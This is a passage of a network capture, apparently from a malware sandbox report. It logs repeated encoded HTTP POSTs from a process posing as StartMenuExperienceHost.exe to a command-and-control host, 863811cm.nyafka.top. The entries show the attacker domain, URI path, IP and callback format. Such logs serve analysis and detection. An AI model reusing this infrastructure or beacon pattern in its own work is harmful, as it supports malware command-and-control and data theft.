                                                                Oct 11, 2024 01:37:37.940885067 CEST2584OUTData Raw: 55 5e 5d 5b 54 55 58 51 5e 5a 55 58 51 54 5a 5e 57 5f 58 5e 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^][TUXQ^ZUXQTZ^W_X^U]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<>,+*#&. ?5! (3U74$-&*845/=;#Y$/\*%
                                                                Oct 11, 2024 01:37:38.065457106 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:38.326746941 CEST603INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiyx7M9qfBzmLk%2Fk8fy3UlVvF29kRvzcl8QknglZxQf3sJBV%2B10LtfXiL%2FmnFvW%2FCqBbDi943L2BTsPzJeFB7%2FfG0toiTDD2B9uG1leyN6eXtREaze%2B5DNr%2FX7zxj34fMd97DjGs"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a707c9e2e438c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:38.373322010 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:38.473175049 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:38.473392010 CEST540OUTData Raw: 50 5f 58 5a 54 5b 58 5f 5e 5a 55 58 51 51 5a 53 57 5a 58 5a 55 5c 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_XZT[X_^ZUXQQZSWZXZU\Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y(=+#T%0@+6(_6(+U=V '7S$[1> G61(Z>;#Y$/\*1
                                                                Oct 11, 2024 01:37:38.733536005 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2gn50dB63nnNPvUOAoMahvYD8H6r63URT2DIJm6QVpnOOlYV3Km34eIwZgCG4%2B87oFxS7F8e5cFSVIVZPYbDwDnwJIE7p0t2ajZ%2F879WBNFmeIjSDba9I9z3O%2BSCcN5kwrxMima"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a707f28ed438c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:38.737071037 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:38.837546110 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:38.837745905 CEST2584OUTData Raw: 50 5d 58 5e 54 55 5d 54 5e 5a 55 58 51 53 5a 52 57 58 58 58 55 53 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]X^TU]T^ZUXQSZRWXXXUSQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+(]+93V%=,E+&/"(,(& $;S$[9V>8/ 1?)+#Y$/\*9
                                                                Oct 11, 2024 01:37:39.114933968 CEST611INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2B%2FhX5snn%2F6zFUsVEz%2FPkgQZJWjIdIJJn%2Bx43kmh8gPBITn7qZnd%2BBDCzw%2FbbNKp%2FYbnbEe%2BLLNBantI51%2Fbjh7KwopN0PiYWtfGUzApuuWxijAaYSRdnjHkIp4QJiGOjPihyftQ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70816b22438c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:39.117676973 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----MZDXLsvNDmH2j6dJNWIEXsKkXw6XMr0MSC
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3014
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:39.217861891 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:39.219743013 CEST3014OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 5a 44 58 4c 73 76 4e 44 6d 48 32 6a 36 64 4a 4e 57 49 45 58 73 4b 6b 58 77 36 58 4d 72 30 4d 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------MZDXLsvNDmH2j6dJNWIEXsKkXw6XMr0MSCContent-Disposition: form-data; name="0"Content-Type: text/plainUY]ZTZ]S^ZUXQTZ[WXXZUPQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:37:39.490386009 CEST594INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nL%2BDm92cNLSHxtBb%2Fs454cZnoiwUWVJ5PE30syV2Dae0Et8ZTJN60aE7oR5oFzOuYxURRtWxEMr9tRx%2FVLSMn9r%2B00NhVEASDZTEB5bP72W223VcZ631%2FT5RLKcyy08x2JXcCsWr"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7083cdde438c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:37:39.626530886 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:37:39.629101038 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:39.729310989 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:39.732786894 CEST2584OUTData Raw: 55 5f 5d 5d 54 5c 5d 53 5e 5a 55 58 51 5d 5a 5a 57 50 58 58 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_]]T\]S^ZUXQ]ZZWPXXU]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\+[7</1,+&35;$( " '!*^<C6;);#Y$/\*
                                                                Oct 11, 2024 01:37:40.036329985 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2VUa8DKHyan3nqlmk3l1oS7rP83jdZNjU1k7u6opoPOSEjbkVEWNJWb4a2G08csprhJXqAlxb02RypMFNYsUqu3i882gm%2B83%2BP3yQx4tEslD3kna9lVkZXKCDxmfa1PyXfQupyLJ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7086f9f5438c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                109192.168.2.550091188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:37.666052103 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:38.018914938 CEST2004OUTData Raw: 55 5d 58 5f 54 59 58 5e 5e 5a 55 58 51 52 5a 5a 57 59 58 58 55 5c 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]X_TYX^^ZUXQRZZWYXXU\QZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+=< 2 D<$\6 ?U:!$&=*(62,_*;#Y$/\*
                                                                Oct 11, 2024 01:37:38.137613058 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:38.389740944 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TOchXitxSe80d9JTlc2HXUzPV6E4J0MA4YCy%2Fwg1i81n5JQtOFlYbu9w3xuyFYiAlPRyHcRWznljHoPHXxyxJUveaVksJ3NR3zba2SDMFveIYp0Deftgbax%2ByEZPX%2FboagrGmbuq"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a707d0d9d0c95-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 3e 00 26 1f 37 2e 3c 01 38 22 27 03 3d 03 0c 59 2b 0f 09 5b 31 24 19 1a 2e 12 2d 52 22 28 37 00 3d 3c 29 03 33 3f 37 58 28 21 2a 51 03 1b 39 5b 2b 30 3b 1e 29 22 07 17 2b 1c 3d 5f 27 0d 14 1c 2b 2e 35 50 27 10 21 07 21 0f 38 57 3e 3c 09 52 3b 05 01 45 3e 38 3a 58 21 2b 2a 5f 08 13 39 57 29 5e 2b 09 35 27 25 5d 36 04 3b 57 36 39 32 1b 29 39 2a 57 24 20 20 5f 2f 54 34 1d 20 2c 20 0e 35 05 32 54 37 3d 2c 5b 26 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>&7.<8"'=Y+[1$.-R"(7=<)3?7X(!*Q9[+0;)"+=_'+.5P'!!8W><R;E>8:X!+*_9W)^+5'%]6;W692)9*W$ _/T4 , 52T7=,[&"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                110192.168.2.550092188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:38.509898901 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:38.862665892 CEST1984OUTData Raw: 50 5f 58 59 54 5a 5d 51 5e 5a 55 58 51 5d 5a 5a 57 5c 58 55 55 5d 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_XYTZ]Q^ZUXQ]ZZW\XUU]Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X<3<?%X8E+C(]5?]+#: $$3-)((7"W0*#Y$/\*
                                                                Oct 11, 2024 01:37:38.974814892 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:39.230293989 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VIOzax9atnFgg1xOc5F8XvHXf7LADedG1CMMkD5qRU1qPdW9zEVwkk%2BRaupESEssQh3pBUCUSDjrtI4SaDMLYh5buzU3CAqy4DurLxo41pjBkv9lqJjfterKBigqNOx5%2Bi1skrBj"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70824ce0422b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 28 29 0f 0e 37 2e 2f 59 2f 0f 01 01 3e 3d 0c 58 2b 22 33 10 26 0a 11 5e 2d 3c 04 0f 22 3b 34 5d 29 2f 35 02 30 5a 37 5a 29 31 2a 51 03 1b 39 58 28 0a 3b 1e 3f 31 26 03 3f 0b 3a 04 30 1d 3e 18 2a 2e 21 12 30 2e 25 01 22 1f 34 53 3e 12 2f 1f 2f 2b 34 18 28 38 3a 58 23 01 2a 5f 08 13 39 56 28 38 3c 1d 22 19 07 5d 36 03 15 52 35 07 21 0a 29 3a 2e 57 27 0d 01 01 2c 22 27 01 34 3c 33 50 21 5a 32 54 20 2d 0e 11 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98']()7./Y/>=X+"3&^-<";4])/50Z7Z)1*Q9X(;?1&?:0>*.!0.%"4S>//+4(8:X#*_9V(8<"]6R5!):.W',"'4<3P!Z2T -%("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                111192.168.2.550093188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:39.354685068 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:39.706512928 CEST1984OUTData Raw: 55 5a 5d 5a 54 54 58 52 5e 5a 55 58 51 5c 5a 53 57 5c 58 59 55 5d 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UZ]ZTTXR^ZUXQ\ZSW\XYU]Q_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(>#<\?1+*606(/+ & /S$%);8A !)#Y$/\*
                                                                Oct 11, 2024 01:37:39.807230949 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:40.057351112 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=05KPvpTbJHcgyHI%2BV7z8ptSWP1D0iKv8WdIi763%2F98%2BOJf%2BjuOyxWti5cAPeqy1yeApQi8s8ixqXoulUN%2BxbpTSZKla8vWTQZwzy7t90lcG6Es3JGygTj6clR99lZCot3xHd9Ig2"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a708789ddc359-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 3e 07 0c 55 34 00 23 58 3b 1f 05 03 2b 2d 32 5f 28 0f 01 5e 26 37 28 07 39 2f 29 52 22 05 28 5f 2a 05 36 5e 24 05 2f 58 2b 1b 2a 51 03 1b 3a 00 28 30 28 0d 2b 1c 36 04 28 22 3e 01 27 1d 1c 1d 29 5b 21 50 33 3d 22 5f 35 32 3c 1c 3e 12 09 54 2d 3b 23 45 2a 3b 3e 10 21 3b 2a 5f 08 13 39 1d 29 16 0e 56 35 27 36 06 23 2d 3f 55 36 17 07 0f 3e 17 26 51 27 33 27 01 2f 31 3b 07 37 59 30 0d 22 5a 2a 53 21 3d 33 05 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>U4#X;+-2_(^&7(9/)R"(_*6^$/X+*Q:(0(+6(">')[!P3="_52<>T-;#E*;>!;*_9)V5'6#-?U6>&Q'3'/1;7Y0"Z*S!=3&("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                112192.168.2.550094188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:40.229541063 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:40.581382990 CEST2004OUTData Raw: 55 5d 5d 5c 51 5c 58 56 5e 5a 55 58 51 56 5a 52 57 51 58 5d 55 57 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]\Q\XV^ZUXQVZRWQX]UWQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X+='(\/W%/<%<\5;+X<#47$3>!V*+#51>;#Y$/\*-
                                                                Oct 11, 2024 01:37:40.725914001 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:40.978355885 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dzpZKtRdnWkP2esoVboRkqRS3jPaHJ2LTZEOAXl8C5tc%2F2mtcs%2BqyuC9cbpmoZDzj%2FWFAPG0zVqkn6A%2Bee1LN98chzqY5nB0H2SiHZktMPIv4xzEcoBLTTjbFlblVf%2FZpV8BPJ1a"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a708d3af5c44a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 1b 29 00 25 0d 23 00 0d 12 3b 0f 3f 03 3e 3e 3d 01 28 0f 0a 03 32 1a 16 06 39 02 26 0a 22 05 30 15 3e 3f 36 5e 24 12 06 02 3f 1b 2a 51 03 1b 3a 06 2b 20 3b 55 29 31 36 07 2b 0c 2e 00 27 0d 32 1c 29 3d 26 0e 25 3e 0f 05 21 1f 0e 53 29 12 20 0b 3b 05 27 42 3d 38 2e 10 37 3b 2a 5f 08 13 39 57 3d 28 20 51 22 09 3a 00 21 2d 38 0c 36 39 26 19 2a 29 00 50 33 30 38 17 38 0c 28 13 20 59 20 09 35 3f 36 1d 20 03 2b 04 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98')%#;?>>=(29&"0>?6^$?*Q:+ ;U)16+.'2)=&%>!S) ;'B=8.7;*_9W=( Q":!-869&*)P3088( Y 5?6 +%"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                113192.168.2.550095188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:40.248159885 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:40.596904993 CEST2584OUTData Raw: 55 58 5d 5c 51 5f 58 56 5e 5a 55 58 51 50 5a 5a 57 5b 58 58 55 57 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UX]\Q_XV^ZUXQPZZW[XXUWQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?Z<)01=?+%4"+/Y< !#?0>%V=;<!0_)#Y$/\*5
                                                                Oct 11, 2024 01:37:40.788904905 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:41.036178112 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dw45ytZoGzJLQ2%2Fwpkn0rQo1ISjCeqHn6EM4v%2Bvia9wIxxlGYXlrRm8aOW32EG%2BqUFpiRDELL23vwwbxEldFJkuS4NcdtFmnPMfEj4bZtPPMEWKj%2FL41Z6dlgYAT%2BfjJ5i3nZXYy"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a708da9fc43f2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                114192.168.2.550096188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
